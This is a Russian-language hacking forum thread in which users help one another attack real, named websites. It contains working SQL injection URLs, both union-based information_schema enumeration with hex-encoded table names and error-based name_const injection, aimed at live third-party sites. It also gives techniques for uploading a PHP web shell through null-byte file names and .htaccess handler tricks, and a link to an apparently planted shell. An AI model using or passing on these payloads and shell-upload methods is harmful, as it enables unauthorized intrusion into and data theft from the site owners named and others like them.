Ваши вопросы по уязвимостям.

а .htaccess можно залить?

 

можно

 

а если shell.php%00.gif то обработается корректно или нет ?

 

так попробуй загрузить .htaccess и в нем прописать "AddHandler x-httpd-php .gif"

 

Наткнулся на сайт __http://www.kvartal.ru, побродил по ссылкам и сразу нашел ошибку скрипта при подстановки в параметр кавычки:
__http://www.kvartal.ru/index.php?id=21%27
По всему похоже, что может получиться стандартная скуль, но пока не получается: пробовал вот как
1) http://www.kvartal.ru/index.php?id=21+and+1=1
2) http://www.kvartal.ru/index.php?id=21+and+1=2
вывод одинаковый, подстановка коментов тоже не помогла, ну и как и следовало ожидать подбор столбцов через order by тоже ни к чему не привел. Походу это ошибка скрипта, но не скуль.
Есть предположения в чем проблема?

 

Банальная строковая иньекция

Админка:

 

Все понял, спасибо. Ошибка была в том, что у параметра кавычку убирал и условия ставил.

 

хм...когда я заливаю шелл через админку, и потом прохожу по его урлу почему-то отображается сам код пхп-шелла, т.е он сам не выполняется...в чем причина ?

 

.htaccess мб

 

Если прикручен модуль mod_include
попробуй загрузить shell.txt с данными:

 

Слепая

_http://www.parperfecto.com/able/events_view.php?eid=10/**/and/**/(1,2)in(select/**/*/**/from(select/**/name_const(version(),1),name_const(version(),1))as/**/a)

Code:

Duplicate column name '[COLOR=Red]5.0.77[/COLOR]'

 

i добавь к имени базы и появится)

проще наверно так)

http://www.parperfecto.com/yaneshell.php

 

вот например здесь..
http://www.unialco.com.br/jobs/details.php?id=-48'+union+select+1,2,GROUP_CONCAT(TABLE_NAME),4,5,6,7,8,9,10+FROM+information_schema.tables+WHERE+ASCII(LOWER(TABLE_NAME))=117+--+

здесь запрос зделано так чтоби показано таблици ц начунаюших с букви у..

а как вот здесь WHERE+ASCII(LOWER(TABLE_NAME))=117 напистаь полное имя таблици ??

 

http://www.unialco.com.br/jobs/details.php?id=-48'+union+select+1,2,GROUP_CONCAT(TABLE_NAME),4,5, 6,7,8,9,10+FROM+information_schema.tables+WHERE+table_name='your_table'--

 

Помоему смысла в этом запросе никакого нету, ибо получаем имя таблицы где имя таблицы равно имени таблицы)
Ну и вопрос тоже какой то непонятный.
Получать таблицы с именем начинающемся с U лучше так:

Code:

http://www.unialco.com.br/jobs/details.php?id=-48%27+union+select+1,2,GROUP_CONCAT(TABLE_NAME),4,5,%206,7,8,9,10+FROM+information_schema.tables+where+table_name>0x55+--+

 

а вот именно where+table_name>x55+--+ здесь как написать >полнуй имя таблици ??

 

Ога, PHP невыполняеться, а ASP.NET на Apache сервере с расширением .txt выполниться..

 

Всё, догнал, что ты хотел. Да, полное имя таблицы в hex

 

ne polucaetsya..

http://www.unialco.com.br/jobs/details.php?id=-48%27+union+select+1,2,GROUP_CONCAT(COLUMN_NAME),4,5,6,7,8,9,10+FROM+information_schema.columns+WHERE+table_name=0x7573657273+AND+ASCII(LOWER(COLUMN_NAME))=x75+--+

i ne tak..

http://www.unialco.com.br/jobs/details.php?id=-48%27+union+select+1,2,GROUP_CONCAT(COLUMN_NAME),4,5,6,7,8,9,10+FROM+information_schema.columns+WHERE+table_name=0x7573657273+AND+ASCII(LOWER(COLUMN_NAME))=x75736572+--+

 

0x75736572